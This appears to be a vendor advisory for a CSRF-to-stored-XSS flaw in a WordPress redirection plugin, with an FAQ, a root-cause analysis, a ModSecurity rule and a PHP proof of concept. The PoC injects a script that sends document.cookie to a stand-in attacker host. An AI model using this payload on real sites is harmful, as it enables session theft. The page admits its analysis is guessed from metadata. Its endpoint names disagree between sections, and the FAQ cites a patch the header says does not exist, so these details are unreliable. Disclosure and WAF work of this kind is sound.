What is CVE-2026-7561?

CVE-2026-7561 is a Cross-Site Request Forgery (CSRF) vulnerability in the Tm – WordPress Redirection plugin, affecting versions up to and including 1.2. It allows unauthenticated attackers to forge requests that can modify settings and inject malicious scripts into the WordPress admin panel.

How does this vulnerability work?

The vulnerability arises from missing nonce validation in the plugin’s settings update function. An attacker can craft a malicious link that, when clicked by an authenticated administrator, sends a forged request to update redirection settings, potentially injecting stored cross-site scripting (XSS) payloads.

Who is affected by this vulnerability?

Any WordPress site using the Tm – WordPress Redirection plugin version 1.2 or earlier is affected. Site administrators should check their installed plugins and versions to determine if they need to take action.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the Plugins section in the WordPress admin dashboard and look for the Tm – WordPress Redirection plugin. If the version is 1.2 or earlier, your site is at risk and should be updated immediately.

What steps should I take to fix the issue?

Update the Tm – WordPress Redirection plugin to the latest version where the vulnerability is patched. Additionally, consider implementing nonce verification in your own custom code if you are using similar patterns in other plugins.

What does the CVSS score of 6.1 mean?

A CVSS score of 6.1 indicates a medium severity vulnerability. This means that while the vulnerability is not the highest threat level, it can still be exploited under certain conditions and poses a significant risk to the security of the affected WordPress installation.

How can I mitigate the risk of this vulnerability?

In addition to updating the plugin, ensure that all user roles are properly managed and limit administrative access to trusted users only. Regularly review and sanitize input fields in custom plugins to prevent similar vulnerabilities.

What is stored cross-site scripting (XSS)?

Stored XSS is a type of vulnerability where an attacker is able to inject malicious scripts into a web application, which are then stored on the server and executed in the context of users who access the affected page. This can lead to session hijacking, data theft, or other malicious actions.

How does the proof of concept demonstrate the issue?

The proof of concept shows how an attacker can send a crafted request to the vulnerable plugin’s settings update endpoint, including a malicious payload. This simulates a CSRF attack that exploits the lack of nonce validation, demonstrating how an attacker could inject harmful scripts into the site.

What should I do if I have been compromised?

If you suspect that your site has been compromised due to this vulnerability, immediately remove the vulnerable plugin, change all admin passwords, and review your site for unauthorized changes or malicious content. Consider restoring from a clean backup if necessary.

Are there any additional resources for securing WordPress?

Yes, the WordPress Codex and official documentation provide guidelines on securing WordPress sites. Additionally, consider using security plugins that offer features like firewall protection, malware scanning, and login attempt monitoring to enhance your site’s security.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 11, 2026

CVE-2026-7561: Tm – WordPress Redirection <= 1.2 – Cross-Site Request Forgery to Stored Cross-Site Scripting (tm-wordpress-redirection)

CVE ID CVE-2026-7561

Plugin tm-wordpress-redirection

Severity Medium (CVSS 6.1)

CWE 352

Vulnerable Version 1.2

Patched Version —

Disclosed May 10, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-7561 (metadata-based): This vulnerability affects the Tm – WordPress Redirection plugin, version 1.2 and earlier. A Cross-Site Request Forgery (CSRF) flaw exists due to missing or incorrect nonce validation on a plugin function handling settings updates. This allows an unauthenticated attacker to forge requests that, when triggered by an authenticated administrator, can modify redirection settings and inject stored cross-site scripting (XSS) payloads. The CVSS score is 6.1 (Medium), with a vector of AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N.

Root Cause: The plugin likely registers an administrative action, probably via an AJAX handler or an admin-post hook, to save redirection rules or plugin settings. The function responsible for processing this action does not verify a WordPress nonce token before executing the update. Without nonce validation, the plugin accepts any incoming request matching the action name, trusting browser-sourced data. Since no code diff is available, Atomic Edge infers this pattern from the CWE-352 classification and the description’s mention of ‘missing or incorrect nonce validation on a function.’ The stored XSS component arises because the plugin either fails to sanitize user-supplied input when saving settings or fails to escape output when rendering the redirection rules in the admin dashboard.

Exploitation: An attacker crafts a malicious link or automatically submits a form from an external site. The request targets the plugin’s settings update endpoint. For typical WordPress plugins, this endpoint is either admin-ajax.php with action=tm_wordpress_redirection_save, or admin-post.php with action=tm_wordpress_redirection_update. The attacker includes parameters corresponding to redirection rules, such as source_url, target_url, and a JavaScript payload like “>alert(‘XSS’) or a more sophisticated payload that exfiltrates cookies or performs admin actions. The attacker then tricks a logged-in administrator into clicking the link or visiting the attacker-controlled page. The administrator’s browser automatically sends the forged request with cookies. The plugin saves the malicious settings without checking the nonce, resulting in stored XSS that triggers when the administrator views the redirection list.

Remediation: Atomic Edge advises plugin developers to add nonce verification using WordPress’s wp_verify_nonce() function before processing settings updates. Additionally, the plugin must sanitize all incoming text fields with sanitize_text_field(), sanitize_url(), or similar functions before storing them in the database. When displaying redirection rules in the admin interface, the plugin must escape output using esc_url() for URLs and esc_html() for other text to prevent stored XSS.

Impact: Successful exploitation allows attackers to inject arbitrary JavaScript into the WordPress admin panel. This stored XSS can steal administrator session cookies, create new admin users, install malicious plugins, or redirect site traffic to phishing pages. The CSRF component enables the initial injection without direct authentication, lowering the barrier to exploitation. The vulnerability does not provide direct file read or remote code execution, but the combined CSRF to stored XSS chain effectively compromises the entire WordPress installation.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-7561 (metadata-based)
# Blocks CSRF-based stored XSS exploitation by detecting requests to the vulnerable AJAX endpoint.
# The rule triggers when the action parameter matches the plugin's settings save handler.
# This is a virtual patch; the root cause (lack of nonce) cannot be fixed at WAF level.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20267561,phase:2,deny,status:403,chain,msg:'CVE-2026-7561 CSRF to XSS via Tm WordPress Redirection plugin',severity:'CRITICAL',tag:'CVE-2026-7561'"
  SecRule ARGS_POST:action "@streq tm_wordpress_redirection_save_settings" "chain"
    SecRule ARGS_NAMES "@rx ^(source|target|http_code)$" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-7561 - Tm – WordPress Redirection <= 1.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting

// Configuration: Set the target WordPress site URL (replace with the actual target)
$target_url = 'http://example.com';

// The vulnerable plugin's admin AJAX action (inferred from plugin slug "tm-wordpress-redirection")
$ajax_action = 'tm_wordpress_redirection_save_settings';

// Malicious payload: Stored XSS injected into a redirection target URL
$payload = '"><script>fetch("https://attacker.example.com/steal?cookie="+document.cookie)</script>';

// Build the POST request simulating a forged CSRF request
$post_data = array(
    'action'    => $ajax_action,
    'source'    => '/old-page',
    'target'    => $payload,
    'http_code' => '301'
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[+] CSRF request sent to: $target_url/wp-admin/admin-ajax.phpn";
echo "[+] HTTP response code: $http_coden";
echo "[+] Payload injected: target=$payloadn";
echo "[+] If an administrator was tricked into clicking the crafted link, the XSS payload is now stored.n";
?>

Frequently Asked Questions

What is CVE-2026-7561?
Understanding the vulnerability
CVE-2026-7561 is a Cross-Site Request Forgery (CSRF) vulnerability in the Tm – WordPress Redirection plugin, affecting versions up to and including 1.2. It allows unauthenticated attackers to forge requests that can modify settings and inject malicious scripts into the WordPress admin panel.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from missing nonce validation in the plugin’s settings update function. An attacker can craft a malicious link that, when clicked by an authenticated administrator, sends a forged request to update redirection settings, potentially injecting stored cross-site scripting (XSS) payloads.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Tm – WordPress Redirection plugin version 1.2 or earlier is affected. Site administrators should check their installed plugins and versions to determine if they need to take action.
How can I check if my site is vulnerable?
Verifying plugin version
To check if your site is vulnerable, navigate to the Plugins section in the WordPress admin dashboard and look for the Tm – WordPress Redirection plugin. If the version is 1.2 or earlier, your site is at risk and should be updated immediately.
What steps should I take to fix the issue?
Remediation actions
Update the Tm – WordPress Redirection plugin to the latest version where the vulnerability is patched. Additionally, consider implementing nonce verification in your own custom code if you are using similar patterns in other plugins.
What does the CVSS score of 6.1 mean?
Understanding severity ratings
A CVSS score of 6.1 indicates a medium severity vulnerability. This means that while the vulnerability is not the highest threat level, it can still be exploited under certain conditions and poses a significant risk to the security of the affected WordPress installation.
How can I mitigate the risk of this vulnerability?
Preventive measures
In addition to updating the plugin, ensure that all user roles are properly managed and limit administrative access to trusted users only. Regularly review and sanitize input fields in custom plugins to prevent similar vulnerabilities.
What is stored cross-site scripting (XSS)?
Definition and implications
Stored XSS is a type of vulnerability where an attacker is able to inject malicious scripts into a web application, which are then stored on the server and executed in the context of users who access the affected page. This can lead to session hijacking, data theft, or other malicious actions.
How does the proof of concept demonstrate the issue?
Technical illustration of exploitation
The proof of concept shows how an attacker can send a crafted request to the vulnerable plugin’s settings update endpoint, including a malicious payload. This simulates a CSRF attack that exploits the lack of nonce validation, demonstrating how an attacker could inject harmful scripts into the site.
What should I do if I have been compromised?
Response to exploitation
If you suspect that your site has been compromised due to this vulnerability, immediately remove the vulnerable plugin, change all admin passwords, and review your site for unauthorized changes or malicious content. Consider restoring from a clean backup if necessary.
Are there any additional resources for securing WordPress?
Further reading and tools
Yes, the WordPress Codex and official documentation provide guidelines on securing WordPress sites. Additionally, consider using security plugins that offer features like firewall protection, malware scanning, and login attempt monitoring to enhance your site’s security.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations